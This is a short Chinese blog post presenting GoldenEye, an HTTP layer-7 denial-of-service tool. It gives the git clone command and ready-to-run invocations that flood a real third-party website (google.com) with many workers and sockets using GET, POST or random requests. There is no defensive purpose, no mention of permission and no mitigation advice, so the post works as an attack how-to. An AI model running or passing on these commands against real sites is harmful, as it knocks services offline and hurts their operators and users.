HTTP Dos 工具 GoldenEye

2015-09-18 資安攻防戰

GoldenEye 是一個 HTTP 的 DoS 工具,GoldenEye 的特性是會持續性的與目標建立連線,並且 Keep Alive + NoCache

 

GoldenEye 支援 L7 的攻擊,並且可以選擇使用 get 或是 post 甚至是 random(隨機) 的方式去進行攻擊

 

GoldenEye GitHub

 

安裝並下載 GoldenEye

$ git clone https://github.com/jseidl/GoldenEye.git
Initialized empty Git repository in /home/GoldenEye/.git/

$ ls
goldeneye.py  README.md  res  util

 

 

 

 

GoldenEye 的使用

一般使用方式

$ ./goldeneye.py http://www.google.com

 

增加 worker & sockes 使攻擊連線增加

$ ./goldeneye.py http://www.google.com -w 100 -s 1000

 

改變攻擊方式為 post,也可以用 random

$ ./goldeneye.py http://www.google.com -w 100 -s 1000 -m post

 

給 Mr. 沙先生一點建議

彙整

分類

展開全部 | 收合全部

License

訂閱 Mr. 沙先生 的文章

輸入你的 email 用於訂閱